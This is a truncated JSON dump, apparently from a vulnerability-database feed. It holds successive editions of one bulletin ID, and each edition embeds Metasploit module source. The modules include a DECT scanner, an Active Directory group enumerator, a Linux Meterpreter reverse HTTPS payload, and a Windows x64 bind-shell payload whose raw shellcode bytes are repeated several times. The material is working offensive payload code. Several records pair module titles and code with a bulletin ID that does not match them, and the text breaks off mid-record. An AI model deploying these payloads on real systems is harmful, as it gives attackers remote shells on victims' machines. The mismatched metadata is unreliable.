https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::DECT_COA\n\n def initialize\n super(\n 'Name' => 'DECT Base Station Scanner',\n 'Description' => 'This module scans for DECT base stations',\n 'Author' => [ 'DK <privilegedmode[at]gmail.com>' ],\n 'License' => MSF_LICENSE\n )\n\n end\n\n\n def print_results\n print_line(\"RFPI\\t\\tChannel\")\n @base_stations.each do |rfpi, data|\n print_line(\"#{data['rfpi']}\\t#{data['channel']}\")\n end\n end\n\n def run\n @base_stations = {}\n\n print_status(\"Opening interface: #{datastore['INTERFACE']}\")\n print_status(\"Using band: #{datastore['BAND']}\")\n\n open_coa\n\n begin\n\n print_status(\"Changing to fp scan mode.\")\n fp_scan_mode\n print_status(\"Scanning...\")\n\n while(true)\n data = poll_coa()\n\n if (data)\n parsed_data = parse_station(data)\n if (not @base_stations.key?(parsed_data['rfpi']))\n print_good(\"Found New RFPI: #{parsed_data['rfpi']}\")\n @base_stations[parsed_data['rfpi']] = parsed_data\n end\n end\n\n next_channel\n\n vprint_status(\"Switching to channel: #{channel}\")\n select(nil,nil,nil,1)\n end\n ensure\n print_status(\"Closing interface\")\n stop_coa()\n close_coa()\n end\n\n print_results\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-25T07:13:24", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 14}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/X64/SHELL_BIND_TCP", "hash": "d3aa2f8684d6dd258707ef5b8753c445", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows x64 Command Shell, Bind TCP Inline", "description": "Listen for a connection and spawn a command shell (Windows x64)\n", "published": "2009-08-27T19:29:54", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-25T08:23:05", "history": [], "viewCount": 19, "enchantments": {"score": {"value": 4.4, "vector": "NONE", "modified": "2019-07-25T08:23:05"}, "dependencies": {"references": [{"type": "pentestit", "idList": ["PENTESTIT:3699C81C5F2D75668446A68245CA8BA5"]}, {"type": "kitploit", "idList": ["KITPLOIT:1521717899068290187"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:89070BA9467D02F1834CE0214BB8B605"]}, {"type": "cve", "idList": ["CVE-2019-3622", "CVE-2019-3591", "CVE-2019-2799", "CVE-2019-11694", "CVE-2019-9818", "CVE-2019-11700", "CVE-2019-11702"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:353CB4603C296A43DDDDDAE6CAC6BE25"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142659", "OPENVAS:1361412562310142653", "OPENVAS:1361412562310142655", "OPENVAS:1361412562310142657", "OPENVAS:1361412562310142651"]}, {"type": "exploitdb", "idList": ["EDB-ID:47152"]}, {"type": "myhack58", "idList": ["MYHACK58:62201995204"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:3A2630BDE36D76A2AD8878BA46386B1A"]}, {"type": "threatpost", "idList": ["THREATPOST:5049F818B995E5121EDA184A34A957E6"]}], "modified": "2019-07-25T08:23:05"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/windows/x64/shell_bind_tcp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 505\n\n include Msf::Payload::Windows\n include Msf::Payload::Single\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Windows x64 Command Shell, Bind TCP Inline',\n 'Description' => 'Listen for a connection and spawn a command shell (Windows x64)',\n 'Author' => [ 'sf' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Handler' => Msf::Handler::BindTcp,\n 'Session' => Msf::Sessions::CommandShell,\n 'Payload' =>\n {\n 'Offsets' =>\n {\n 'LPORT' => [ 232, 'n' ],\n 'EXITFUNC' => [ 467, 'V' ],\n },\n 'Payload' =>\n \"\\xFC\\x48\\x83\\xE4\\xF0\\xE8\\xC0\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\\x51\" +\n \"\\x56\\x48\\x31\\xD2\\x65\\x48\\x8B\\x52\\x60\\x48\\x8B\\x52\\x18\\x48\\x8B\\x52\" +\n \"\\x20\\x48\\x8B\\x72\\x50\\x48\\x0F\\xB7\\x4A\\x4A\\x4D\\x31\\xC9\\x48\\x31\\xC0\" +\n \"\\xAC\\x3C\\x61\\x7C\\x02\\x2C\\x20\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\\xE2\\xED\" +\n \"\\x52\\x41\\x51\\x48\\x8B\\x52\\x20\\x8B\\x42\\x3C\\x48\\x01\\xD0\\x8B\\x80\\x88\" +\n \"\\x00\\x00\\x00\\x48\\x85\\xC0\\x74\\x67\\x48\\x01\\xD0\\x50\\x8B\\x48\\x18\\x44\" +\n \"\\x8B\\x40\\x20\\x49\\x01\\xD0\\xE3\\x56\\x48\\xFF\\xC9\\x41\\x8B\\x34\\x88\\x48\" +\n \"\\x01\\xD6\\x4D\\x31\\xC9\\x48\\x31\\xC0\\xAC\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\" +\n \"\\x38\\xE0\\x75\\xF1\\x4C\\x03\\x4C\\x24\\x08\\x45\\x39\\xD1\\x75\\xD8\\x58\\x44\" +\n \"\\x8B\\x40\\x24\\x49\\x01\\xD0\\x66\\x41\\x8B\\x0C\\x48\\x44\\x8B\\x40\\x1C\\x49\" +\n \"\\x01\\xD0\\x41\\x8B\\x04\\x88\\x48\\x01\\xD0\\x41\\x58\\x41\\x58\\x5E\\x59\\x5A\" +\n \"\\x41\\x58\\x41\\x59\\x41\\x5A\\x48\\x83\\xEC\\x20\\x41\\x52\\xFF\\xE0\\x58\\x41\" +\n \"\\x59\\x5A\\x48\\x8B\\x12\\xE9\\x57\\xFF\\xFF\\xFF\\x5D\\x49\\xBE\\x77\\x73\\x32\" +\n \"\\x5F\\x33\\x32\\x00\\x00\\x41\\x56\\x49\\x89\\xE6\\x48\\x81\\xEC\\xA0\\x01\\x00\" +\n \"\\x00\\x49\\x89\\xE5\\x49\\xBC\\x02\\x00\\x11\\x5C\\x00\\x00\\x00\\x00\\x41\\x54\" +\n \"\\x49\\x89\\xE4\\x4C\\x89\\xF1\\x41\\xBA\\x4C\\x77\\x26\\x07\\xFF\\xD5\\x4C\\x89\" +\n \"\\xEA\\x68\\x01\\x01\\x00\\x00\\x59\\x41\\xBA\\x29\\x80\\x6B\\x00\\xFF\\xD5\\x50\" +\n \"\\x50\\x4D\\x31\\xC9\\x4D\\x31\\xC0\\x48\\xFF\\xC0\\x48\\x89\\xC2\\x48\\xFF\\xC0\" +\n \"\\x48\\x89\\xC1\\x41\\xBA\\xEA\\x0F\\xDF\\xE0\\xFF\\xD5\\x48\\x89\\xC7\\x6A\\x10\" +\n \"\\x41\\x58\\x4C\\x89\\xE2\\x48\\x89\\xF9\\x41\\xBA\\xC2\\xDB\\x37\\x67\\xFF\\xD5\" +\n \"\\x48\\x31\\xD2\\x48\\x89\\xF9\\x41\\xBA\\xB7\\xE9\\x38\\xFF\\xFF\\xD5\\x4D\\x31\" +\n \"\\xC0\\x48\\x31\\xD2\\x48\\x89\\xF9\\x41\\xBA\\x74\\xEC\\x3B\\xE1\\xFF\\xD5\\x48\" +\n \"\\x89\\xF9\\x48\\x89\\xC7\\x41\\xBA\\x75\\x6E\\x4D\\x61\\xFF\\xD5\\x48\\x81\\xC4\" +\n \"\\xA0\\x02\\x00\\x00\\x49\\xB8\\x63\\x6D\\x64\\x00\\x00\\x00\\x00\\x00\\x41\\x50\" +\n \"\\x41\\x50\\x48\\x89\\xE2\\x57\\x57\\x57\\x4D\\x31\\xC0\\x6A\\x0D\\x59\\x41\\x50\" +\n \"\\xE2\\xFC\\x66\\xC7\\x44\\x24\\x54\\x01\\x01\\x48\\x8D\\x44\\x24\\x18\\xC6\\x00\" +\n \"\\x68\\x48\\x89\\xE6\\x56\\x50\\x41\\x50\\x41\\x50\\x41\\x50\\x49\\xFF\\xC0\\x41\" +\n \"\\x50\\x49\\xFF\\xC8\\x4D\\x89\\xC1\\x4C\\x89\\xC1\\x41\\xBA\\x79\\xCC\\x3F\\x86\" +\n \"\\xFF\\xD5\\x48\\x31\\xD2\\x48\\xFF\\xCA\\x8B\\x0E\\x41\\xBA\\x08\\x87\\x1D\\x60\" +\n \"\\xFF\\xD5\\xBB\\xE0\\x1D\\x2A\\x0A\\x41\\xBA\\xA6\\x95\\xBD\\x9D\\xFF\\xD5\\x48\" +\n \"\\x83\\xC4\\x28\\x3C\\x06\\x7C\\x0A\\x80\\xFB\\xE0\\x75\\x05\\xBB\\x47\\x13\\x72\" +\n \"\\x6F\\x6A\\x00\\x59\\x41\\x89\\xDA\\xFF\\xD5\"\n }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-25T08:23:05", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 15}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/X64/SHELL_BIND_TCP", "hash": "c5b468fe6b058c0e2f474eb70e61e294", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather Active Directory Groups", "description": "This module will enumerate AD groups on the specified domain.\n", "published": "2015-08-28T14:10:48", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-29T02:56:06", "history": [], "viewCount": 19, "enchantments": {"score": {"value": 3.1, "vector": "NONE", "modified": "2019-07-29T02:56:06"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:6859830935286195620", "KITPLOIT:8796837111710499727", "KITPLOIT:694607214883016670"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153781", "PACKETSTORM:153771", "PACKETSTORM:153772", "PACKETSTORM:153766", "PACKETSTORM:153770"]}, {"type": "cve", "idList": ["CVE-2019-10267", "CVE-2019-13382"]}, {"type": "thn", "idList": ["THN:5BC8F1A67A1CCC7511A6D85B8051C8F3"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:CE06C3F209F8E5D38C7580B181201F1E"]}, {"type": "talosblog", "idList": ["TALOSBLOG:D5D9A609E738B42AF70F4A0AAE59336E", "TALOSBLOG:BDEC9F3166490EE6F1F4DFE075BDD2D9"]}, {"type": "exploitdb", "idList": ["EDB-ID:47177", "EDB-ID:47176", "EDB-ID:47179", "EDB-ID:47181"]}, {"type": "freebsd", "idList": ["38D2DF4D-B143-11E9-87E7-901B0E934D69"]}, {"type": "myhack58", "idList": ["MYHACK58:62201995234"]}], "modified": "2019-07-29T02:56:06"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/enum_ad_groups.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Auxiliary::Report\n include Msf::Post::Windows::LDAP\n # include Msf::Post::Windows::Accounts\n\n USER_FIELDS = ['name',\n 'distinguishedname',\n 'description'].freeze\n\n def initialize(info = {})\n super(update_info(\n info,\n 'Name' => 'Windows Gather Active Directory Groups',\n 'Description' => %(\n This module will enumerate AD groups on the specified domain.\n ),\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Stuart Morgan <stuart.morgan[at]mwrinfosecurity.com>'\n ],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n\n register_options([\n OptString.new('ADDITIONAL_FIELDS', [false, 'Additional fields to retrieve, comma separated', nil]),\n OptString.new('FILTER', [false, 'Customised LDAP filter', nil])\n ])\n end\n\n def run\n @user_fields = USER_FIELDS.dup\n\n if datastore['ADDITIONAL_FIELDS']\n additional_fields = datastore['ADDITIONAL_FIELDS'].gsub(/\\s+/, \"\").split(',')\n @user_fields.push(*additional_fields)\n end\n\n max_search = datastore['MAX_SEARCH']\n\n begin\n f = \"\"\n f = \"(#{datastore['FILTER']})\" if datastore['FILTER']\n q = query(\"(&(objectClass=group)#{f})\", max_search, @user_fields)\n rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e\n # Can't bind or in a network w/ limited accounts\n print_error(e.message)\n return\n end\n\n if q.nil? || q[:results].empty?\n print_status('No results returned.')\n else\n results_table = parse_results(q[:results])\n print_line results_table.to_s\n end\n end\n\n # Takes the results of LDAP query, parses them into a table\n # and records and usernames as {Metasploit::Credential::Core}s in\n # the database.\n #\n # @param [Array<Array<Hash>>] the LDAP query results to parse\n # @return [Rex::Text::Table] the table containing all the result data\n def parse_results(results)\n # Results table holds raw string data\n results_table = Rex::Text::Table.new(\n 'Header' => \"Domain Groups\",\n 'Indent' => 1,\n 'SortIndex' => -1,\n 'Columns' => @user_fields\n )\n\n results.each do |result|\n row = []\n\n result.each do |field|\n if field.nil?\n row << \"\"\n else\n row << field[:value]\n end\n end\n\n results_table << row\n end\n results_table\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-29T02:56:06", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 16}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/X64/SHELL_BIND_TCP", "hash": "d3aa2f8684d6dd258707ef5b8753c445", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows x64 Command Shell, Bind TCP Inline", "description": "Listen for a connection and spawn a command shell (Windows x64)\n", "published": "2009-08-27T19:29:54", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-29T09:34:02", "history": [], "viewCount": 19, "enchantments": {"score": {"value": 2.4, "vector": "NONE", "modified": "2019-07-29T09:34:02"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:47182", "EDB-ID:47177", "EDB-ID:47176", "EDB-ID:47179"]}, {"type": "kitploit", "idList": ["KITPLOIT:6859830935286195620", "KITPLOIT:8796837111710499727", "KITPLOIT:694607214883016670"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153781", "PACKETSTORM:153772", "PACKETSTORM:153771", "PACKETSTORM:153766", "PACKETSTORM:153770"]}, {"type": "cve", "idList": ["CVE-2019-10267", "CVE-2019-13382"]}, {"type": "thn", "idList": ["THN:5BC8F1A67A1CCC7511A6D85B8051C8F3"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:CE06C3F209F8E5D38C7580B181201F1E"]}, {"type": "talosblog", "idList": ["TALOSBLOG:D5D9A609E738B42AF70F4A0AAE59336E", "TALOSBLOG:BDEC9F3166490EE6F1F4DFE075BDD2D9"]}, {"type": "freebsd", "idList": ["38D2DF4D-B143-11E9-87E7-901B0E934D69"]}, {"type": "myhack58", "idList": ["MYHACK58:62201995234"]}], "modified": "2019-07-29T09:34:02"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/windows/x64/shell_bind_tcp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 505\n\n include Msf::Payload::Windows\n include Msf::Payload::Single\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Windows x64 Command Shell, Bind TCP Inline',\n 'Description' => 'Listen for a connection and spawn a command shell (Windows x64)',\n 'Author' => [ 'sf' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Handler' => Msf::Handler::BindTcp,\n 'Session' => Msf::Sessions::CommandShell,\n 'Payload' =>\n {\n 'Offsets' =>\n {\n 'LPORT' => [ 232, 'n' ],\n 'EXITFUNC' => [ 467, 'V' ],\n },\n 'Payload' =>\n \"\\xFC\\x48\\x83\\xE4\\xF0\\xE8\\xC0\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\\x51\" +\n \"\\x56\\x48\\x31\\xD2\\x65\\x48\\x8B\\x52\\x60\\x48\\x8B\\x52\\x18\\x48\\x8B\\x52\" +\n \"\\x20\\x48\\x8B\\x72\\x50\\x48\\x0F\\xB7\\x4A\\x4A\\x4D\\x31\\xC9\\x48\\x31\\xC0\" +\n \"\\xAC\\x3C\\x61\\x7C\\x02\\x2C\\x20\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\\xE2\\xED\" +\n \"\\x52\\x41\\x51\\x48\\x8B\\x52\\x20\\x8B\\x42\\x3C\\x48\\x01\\xD0\\x8B\\x80\\x88\" +\n \"\\x00\\x00\\x00\\x48\\x85\\xC0\\x74\\x67\\x48\\x01\\xD0\\x50\\x8B\\x48\\x18\\x44\" +\n \"\\x8B\\x40\\x20\\x49\\x01\\xD0\\xE3\\x56\\x48\\xFF\\xC9\\x41\\x8B\\x34\\x88\\x48\" +\n \"\\x01\\xD6\\x4D\\x31\\xC9\\x48\\x31\\xC0\\xAC\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\" +\n \"\\x38\\xE0\\x75\\xF1\\x4C\\x03\\x4C\\x24\\x08\\x45\\x39\\xD1\\x75\\xD8\\x58\\x44\" +\n \"\\x8B\\x40\\x24\\x49\\x01\\xD0\\x66\\x41\\x8B\\x0C\\x48\\x44\\x8B\\x40\\x1C\\x49\" +\n \"\\x01\\xD0\\x41\\x8B\\x04\\x88\\x48\\x01\\xD0\\x41\\x58\\x41\\x58\\x5E\\x59\\x5A\" +\n \"\\x41\\x58\\x41\\x59\\x41\\x5A\\x48\\x83\\xEC\\x20\\x41\\x52\\xFF\\xE0\\x58\\x41\" +\n \"\\x59\\x5A\\x48\\x8B\\x12\\xE9\\x57\\xFF\\xFF\\xFF\\x5D\\x49\\xBE\\x77\\x73\\x32\" +\n \"\\x5F\\x33\\x32\\x00\\x00\\x41\\x56\\x49\\x89\\xE6\\x48\\x81\\xEC\\xA0\\x01\\x00\" +\n \"\\x00\\x49\\x89\\xE5\\x49\\xBC\\x02\\x00\\x11\\x5C\\x00\\x00\\x00\\x00\\x41\\x54\" +\n \"\\x49\\x89\\xE4\\x4C\\x89\\xF1\\x41\\xBA\\x4C\\x77\\x26\\x07\\xFF\\xD5\\x4C\\x89\" +\n \"\\xEA\\x68\\x01\\x01\\x00\\x00\\x59\\x41\\xBA\\x29\\x80\\x6B\\x00\\xFF\\xD5\\x50\" +\n \"\\x50\\x4D\\x31\\xC9\\x4D\\x31\\xC0\\x48\\xFF\\xC0\\x48\\x89\\xC2\\x48\\xFF\\xC0\" +\n \"\\x48\\x89\\xC1\\x41\\xBA\\xEA\\x0F\\xDF\\xE0\\xFF\\xD5\\x48\\x89\\xC7\\x6A\\x10\" +\n \"\\x41\\x58\\x4C\\x89\\xE2\\x48\\x89\\xF9\\x41\\xBA\\xC2\\xDB\\x37\\x67\\xFF\\xD5\" +\n \"\\x48\\x31\\xD2\\x48\\x89\\xF9\\x41\\xBA\\xB7\\xE9\\x38\\xFF\\xFF\\xD5\\x4D\\x31\" +\n \"\\xC0\\x48\\x31\\xD2\\x48\\x89\\xF9\\x41\\xBA\\x74\\xEC\\x3B\\xE1\\xFF\\xD5\\x48\" +\n \"\\x89\\xF9\\x48\\x89\\xC7\\x41\\xBA\\x75\\x6E\\x4D\\x61\\xFF\\xD5\\x48\\x81\\xC4\" +\n \"\\xA0\\x02\\x00\\x00\\x49\\xB8\\x63\\x6D\\x64\\x00\\x00\\x00\\x00\\x00\\x41\\x50\" +\n \"\\x41\\x50\\x48\\x89\\xE2\\x57\\x57\\x57\\x4D\\x31\\xC0\\x6A\\x0D\\x59\\x41\\x50\" +\n \"\\xE2\\xFC\\x66\\xC7\\x44\\x24\\x54\\x01\\x01\\x48\\x8D\\x44\\x24\\x18\\xC6\\x00\" +\n \"\\x68\\x48\\x89\\xE6\\x56\\x50\\x41\\x50\\x41\\x50\\x41\\x50\\x49\\xFF\\xC0\\x41\" +\n \"\\x50\\x49\\xFF\\xC8\\x4D\\x89\\xC1\\x4C\\x89\\xC1\\x41\\xBA\\x79\\xCC\\x3F\\x86\" +\n \"\\xFF\\xD5\\x48\\x31\\xD2\\x48\\xFF\\xCA\\x8B\\x0E\\x41\\xBA\\x08\\x87\\x1D\\x60\" +\n \"\\xFF\\xD5\\xBB\\xE0\\x1D\\x2A\\x0A\\x41\\xBA\\xA6\\x95\\xBD\\x9D\\xFF\\xD5\\x48\" +\n \"\\x83\\xC4\\x28\\x3C\\x06\\x7C\\x0A\\x80\\xFB\\xE0\\x75\\x05\\xBB\\x47\\x13\\x72\" +\n \"\\x6F\\x6A\\x00\\x59\\x41\\x89\\xDA\\xFF\\xD5\"\n }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-29T09:34:02", "differentElements": ["description", "modified", "published", "sourceData", "sourceHref", "title"], "edition": 17}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/X64/SHELL_BIND_TCP", "hash": "a68a6f2876e48875fd221c21ecc62752", "type": "metasploit", "bulletinFamily": "exploit", "title": "Linux Meterpreter, Reverse HTTPS Inline", "description": "Run the Meterpreter / Mettle server payload (stageless)\n", "published": "2017-03-21T09:38:18", "modified": "2019-05-21T17:40:27", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-02T21:05:26", "history": [], "viewCount": 19, "enchantments": {"score": {"value": -0.5, "vector": "NONE", "modified": "2019-08-02T21:05:26"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:3061567718276015390", "KITPLOIT:6930354079971299568"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E1AA5BBE6ECD7FF1CDF68AD1858BAA5A", "TALOSBLOG:CBFA94FEB0D96919B90754C4C536B7E3"]}, {"type": "exploitdb", "idList": ["EDB-ID:47205", "EDB-ID:47199"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153863", "PACKETSTORM:153864", "PACKETSTORM:153860", "PACKETSTORM:153855"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F3647F72A71A1ABB510DB822FEC6350D"]}, {"type": "threatpost", "idList": ["THREATPOST:4AFE6ED4AD0DE5F2A6D9EB6F8B200F8C", "THREATPOST:EEEF0864C058C745F05E1162FFDA2FEF", "THREATPOST:CD8C86559669AF2DDA3C15C5907E2CEC"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142687", "OPENVAS:1361412562310142689", "OPENVAS:1361412562310108614"]}, {"type": "mssecure", "idList": ["MSSECURE:1F9805F02A073724B9F63E0197C2A8D2"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:85F42CE87D147D8C6C9E65BF502F9B82"]}], "modified": "2019-08-02T21:05:26"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_https'\nrequire 'msf/base/sessions/meterpreter_options'\nrequire 'msf/base/sessions/mettle_config'\nrequire 'msf/base/sessions/meterpreter_mipsbe_linux'\n\nmodule MetasploitModule\n\n CachedSize = 1470620\n\n include Msf::Payload::Single\n include Msf::Sessions::MeterpreterOptions\n include Msf::Sessions::MettleConfig\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Linux Meterpreter, Reverse HTTPS Inline',\n 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',\n 'Author' => [\n 'Adam Cammack <adam_cammack[at]rapid7.com>',\n 'Brent Cook <brent_cook[at]rapid7.com>',\n 'timwr'\n ],\n 'Platform' => 'linux',\n 'Arch' => ARCH_MIPSBE,\n 'License' => MSF_LICENSE,\n 'Handler' => Msf::Handler::ReverseHttps,\n 'Session' => Msf::Sessions::Meterpreter_mipsbe_Linux\n )\n )\n end\n\n def generate\n opts = {\n scheme: 'https',\n stageless: true\n }\n MetasploitPayloads::Mettle.new('mips-linux-muslsf', generate_config(opts)).to_binary :exec\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-02T21:05:26", "differentElements": ["description", "modified", "published", "sourceData", "sourceHref", "title"], "edition": 18}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/X64/SHELL_BIND_TCP", "hash": "d3aa2f8684d6dd258707ef5b8753c445", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows x64 Command Shell, Bind TCP Inline", "description": "Listen for a connection and spawn a command shell (Windows x64)\n", "published": "2009-08-27T19:29:54", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-02T23:13:04", "history": [], "viewCount": 19, "enchantments": {"score": {"value": -1.6, "vector": "NONE", "modified": "2019-08-02T23:13:04"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:3061567718276015390", "KITPLOIT:6930354079971299568"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E1AA5BBE6ECD7FF1CDF68AD1858BAA5A", "TALOSBLOG:CBFA94FEB0D96919B90754C4C536B7E3"]}, {"type": "exploitdb", "idList": ["EDB-ID:47205", "EDB-ID:47199"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153863", "PACKETSTORM:153864", "PACKETSTORM:153860", "PACKETSTORM:153855"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F3647F72A71A1ABB510DB822FEC6350D"]}, {"type": "threatpost", "idList": ["THREATPOST:4AFE6ED4AD0DE5F2A6D9EB6F8B200F8C", "THREATPOST:EEEF0864C058C745F05E1162FFDA2FEF", "THREATPOST:CD8C86559669AF2DDA3C15C5907E2CEC"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142687", "OPENVAS:1361412562310142689", "OPENVAS:1361412562310108614"]}, {"type": "mssecure", "idList": ["MSSECURE:1F9805F02A073724B9F63E0197C2A8D2"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:85F42CE87D147D8C6C9E65BF502F9B82"]}], "modified": "2019-08-02T23:13:04"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/windows/x64/shell_bind_tcp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 505\n\n include Msf::Payload::Windows\n include Msf::Payload::Single\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Windows x64 Command Shell, Bind TCP Inline',\n 'Description' => 'Listen for a connection and spawn a command shell (Windows x64)',\n 'Author' => [ 'sf' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Handler' => Msf::Handler::BindTcp,\n 'Session' => Msf::Sessions::CommandShell,\n 'Payload' =>\n {\n 'Offsets' =>\n {\n 'LPORT' => [ 232, 'n' ],\n 'EXITFUNC' => [ 467, 'V' ],\n },\n 'Payload' =>\n \"\\xFC\\x48\\x83\\xE4\\xF0\\xE8\\xC0\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\\x51\" +\n \"\\x56\\x48\\x31\\xD2\\x65\\x48\\x8B\\x52\\x60\\x48\\x8B\\x52\\x18\\x48\\x8B\\x52\" +\n \"\\x20\\x48\\x8B\\x72\\x50\\x48\\x0F\\xB7\\x4A\\x4A\\x4D\\x31\\xC9\\x48\\x31\\xC0\" +\n \"\\xAC\\x3C\\x61\\x7C\\x02\\x2C\\x20\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\\xE2\\xED\" +\n \"\\x52\\x41\\x51\\x48\\x8B\\x52\\x20\\x8B\\x42\\x3C\\x48\\x01\\xD0\\x8B\\x80\\x88\" +\n \"\\x00\\x00\\x00\\x48\\x85\\xC0\\x74\\x67\\x48\\x01\\xD0\\x50\\x8B\\x48\\x18\\x44\" +\n \"\\x8B\\x40\\x20\\x49\\x01\\xD0\\xE3\\x56\\x48\\xFF\\xC9\\x41\\x8B\\x34\\x88\\x48\" +\n \"\\x01\\xD6\\x4D\\x31\\xC9\\x48\\x31\\xC0\\xAC\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\" +\n \"\\x38\\xE0\\x75\\xF1\\x4C\\x03\\x4C\\x24\\x08\\x45\\x39\\xD1\\x75\\xD8\\x58\\x44\" +\n \"\\x8B\\x40\\x24\\x49\\x01\\xD0\\x66\\x41\\x8B\\x0C\\x48\\x44\\x8B\\x40\\x1C\\x49\" +\n 